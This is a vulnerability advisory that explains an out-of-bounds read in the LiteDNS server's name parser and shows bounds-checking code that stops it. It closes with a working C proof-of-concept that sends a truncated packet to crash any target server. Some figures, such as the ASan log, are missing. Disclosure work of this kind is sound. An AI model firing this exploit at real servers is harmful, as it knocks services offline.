LiteDNS: Out-of-Bounds Read in DNS Name Parsing Leads to Denial of Service (DoS)

Written by : Antonius (w1sdom)
Web : www.bluedragonsec.com
Github : https://github.com/bluedragonsecurity
Vulnerability discovered by : Antonius
Date of Discovery : March 6 2026

LiteDNS is a lightweight, C-based DNS server that supports basic DNS query resolution for A, AAAA, CNAME, NS, MX, and TXT records. The server runs on Linux.

The project URL is https://github.com/TanishqNanavati/LiteDNS

This DNS server has a remotely exploitable vulnerability that can cause a denial of service.

The vulnerability was tested in this environment:

Tested Environment

Here is the ASan log:

The vulnerability was discovered during fuzzing. Here is the last DNS packet, the one that causes the crash:

Packet in hex:

12 34 01 00 00 01 00 00 00 00 00 00 02 41 42 FF

This packet is 16 bytes total. It is structured as:

So the layout is:

[ DNS Header: 12 bytes ]              [ Question section begins: 4 bytes ]
12 34 01 00 00 01 00 00 00 00 00 00            02 41 42 FF

A valid DNS question must contain:

  1. a complete QNAME
  2. a QTYPE field (2 bytes)
  3. a QCLASS field (2 bytes)

This packet does not contain a complete question; it is a truncated DNS query. It has only:

The Compression Pointer

After the label "AB" (the bytes 0x41 and 0x42), a valid DNS name encoding must continue with an End of Name (0x00) or a Compression Pointer.

When the top 2 bits of a byte are set to 1, the byte marks a compression pointer. 0xFF is 11111111 in binary, so it meets the criterion for a compression pointer, since its top 2 bits are set to 1: 11xxxxxx

Why Does This Compression Pointer Trigger a Denial of Service on LiteDNS?

Because if FF is treated as a compression pointer start, the parser expects:

But the packet ends immediately after 0xFF. What happens in the parser in the background?

Step 1

The parser starts reading the question name at offset 12 (0x02):

12 34 01 00 00 01 00 00 00 00 00 00 02 41 42 FF

So the parser determines that the label length is 2.

Step 2

The parser reads the next 2 bytes, 41 and 42, so the label is “AB”.

Step 3

Now the offset reaches FF. Since FF is a compression pointer, the parser treats it as a pointer byte.

Step 4

The parser then tries to read the next byte to complete the pointer. Unfortunately, there is no next byte in the DNS packet, so the parser reads past the boundary of the received packet.

Step 6

After that, the derived offset may become attacker-influenced garbage, and the parser may continue reading from an invalid location, eventually causing a crash.
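The bounds checks that stop the read described in the steps above, as an added example (this is not LiteDNS code and not part of the original write-up). The helper names dns_skip_name and dns_question_ok are hypothetical, and valid_pkt is a constructed complete query for comparison with the packet from this page.

```c
#include <stdint.h>
#include <stdio.h>

#define DNS_HDR_LEN 12

/* The 16-byte packet from this write-up, and a constructed complete query
 * for the same label "AB" (QTYPE=A, QCLASS=IN) for comparison. */
static const uint8_t page_pkt[]  = {0x12,0x34,0x01,0x00,0x00,0x01,0x00,0x00,
                                    0x00,0x00,0x00,0x00,0x02,0x41,0x42,0xFF};
static const uint8_t valid_pkt[] = {0x12,0x34,0x01,0x00,0x00,0x01,0x00,0x00,0x00,0x00,
                                    0x00,0x00,0x02,0x41,0x42,0x00,0x00,0x01,0x00,0x01};

/* Hypothetical helper: walk the name at `off` in msg[0..len). Returns the offset
 * just past the name as encoded in place, or -1 if a needed byte is out of bounds. */
int dns_skip_name(const uint8_t *msg, size_t len, size_t off)
{
    int end = -1;                       /* set when the first pointer is seen */
    for (;;) {
        if (off >= len) return -1;      /* length/pointer byte itself missing */
        uint8_t b = msg[off];
        if (b == 0) return end >= 0 ? end : (int)off + 1;   /* end of name */
        if ((b & 0xC0) == 0) {          /* plain label of b bytes */
            if (off + 1 + b > len) return -1;   /* label body truncated */
            off += 1 + (size_t)b;
            continue;
        }
        /* 01/10 prefixes are not labels; a 11 pointer needs a second byte. */
        if ((b & 0xC0) != 0xC0 || off + 1 >= len) return -1;
        size_t target = ((size_t)(b & 0x3F) << 8) | msg[off + 1];
        /* Accept only strictly backward targets: in bounds, and cannot loop. */
        if (target < DNS_HDR_LEN || target >= off) return -1;
        if (end < 0) end = (int)off + 2;
        off = target;
    }
}

/* Hypothetical helper: 0 if QNAME + QTYPE + QCLASS all fit, else -1. */
int dns_question_ok(const uint8_t *msg, size_t len)
{
    if (len < DNS_HDR_LEN) return -1;
    int after = dns_skip_name(msg, len, DNS_HDR_LEN);
    return (after < 0 || (size_t)after + 4 > len) ? -1 : 0;
}

int main(void)
{
    printf("page packet: %d, valid packet: %d\n",
           dns_question_ok(page_pkt, sizeof page_pkt),
           dns_question_ok(valid_pkt, sizeof valid_pkt));
    return 0;
}
```

The packet from this page is rejected at the pointer check because offset 15 is the last byte of the datagram; a server using such a check would drop the query or answer with FORMERR instead of continuing to parse.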

Proof of Concept

/*
# Exploit Title: LiteDNS remote denial of service
# Vendor Homepage: https://github.com/TanishqNanavati 
# Software Link: https://github.com/TanishqNanavati/LiteDNS
# Version: LiteDNS before a fix for this issue. If exact tagged versions are unavailable, use: current upstream source / latest tested revision at the time of discovery
# Tested on: CentOS Stream 9
# Google Dork: N/A
# Date: 2026-03-06
# Exploit Author: Antonius 
# Web : www.bluedragonsec.com 
# Github : https://github.com/bluedragonsecurity
# Description:
This is a proof-of-concept exploit for a remote out-of-bounds read in LiteDNS.
LiteDNS is a lightweight, C-based DNS server that supports basic DNS query resolution for A, AAAA, CNAME, NS, MX, and TXT records.
Vulnerability discovered by : Antonius 
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
    int sock;
    struct sockaddr_in server;
    unsigned char packet[] = {0x12, 0x34, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x41, 0x42, 0xff}; 

    if (argc < 3) {
        /* Usage message ends with a newline so the shell prompt is not glued to it. */
        printf("[*] usage : ./exploit <target ip> <port number>\n");
        exit(-1);
    }
    char *ip = argv[1];
    int port = atoi(argv[2]);
    sock = socket(AF_INET, SOCK_DGRAM, 0);
    if (sock < 0) {
        perror("[-] failed to create socket");
        exit(-1);
    }

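    /* Zero the address structure before filling it in. */
    memset(&server, 0, sizeof(server));
    server.sin_family = AF_INET;
    server.sin_port = htons(port);
    /* inet_pton returns 1 only when the string is a valid IPv4 address. */
    if (inet_pton(AF_INET, ip, &server.sin_addr) != 1) {
        fprintf(stderr, "[-] invalid IPv4 address: %s\n", ip);
        close(sock);
        exit(-1);
    }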
    ssize_t sent = sendto(sock, packet, 16, 0, (const struct sockaddr *)&server, sizeof(server));
    
    if (sent < 0) {
        perror("[-] Sendto failed");
    } else {
        printf("[+] Successfully sent %zd bytes to %s:%d\n", sent, ip, port);
    }

    close(sock);

    return 0;
}

References

https://github.com/bluedragonsecurity/LiteDNS_out_of_bounds_read_vulnerability
